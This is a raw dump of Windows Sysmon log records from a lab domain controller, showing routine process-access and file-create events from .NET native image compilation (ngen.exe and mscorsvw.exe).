13:25:50.306{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465E-6000-2F04-000000009A01}4172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.291{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465E-6000-2F04-000000009A01}4172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.291{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465E-6000-2F04-000000009A01}4172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.228{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465E-6000-2E04-000000009A01}1812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.213{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-465E-6000-2E04-000000009A01}1812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:50.213{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465E-6000-2E04-000000009A01}1812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:50.135{08A6967A-465D-6000-2D04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed4-0\PresentationFramework.Luna.dll2021-01-14 13:25:50.135 10341000x80000000000000008317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:51.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465F-6000-3304-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:51.728{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465F-6000-3304-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:51.728{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465F-6000-3304-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:51.619{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-465F-6000-3204-000000009A01}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:51.603{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-465F-6000-3204-000000009A01}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:51.603{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-465F-6000-3204-000000009A01}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:51.510{08A6967A-465E-6000-3104-000000009A01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cd8-0\PresentationUI.dll2021-01-14 13:25:51.510 10341000x80000000000000008327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.994{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4661-6000-3604-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.979{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4661-6000-3604-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.979{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4661-6000-3604-000000009A01}3144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.916{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4661-6000-3504-000000009A01}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.900{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4661-6000-3504-000000009A01}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.900{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4661-6000-3504-000000009A01}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.854{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4661-6000-3404-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.838{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4661-6000-3404-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:53.838{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4661-6000-3404-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:53.713{08A6967A-465F-6000-3304-000000009A01}5068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13cc-0\ReachFramework.dll2021-01-14 13:25:53.713 10341000x80000000000000008340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4662-6000-3A04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:54.729{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4662-6000-3A04-000000009A01}228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 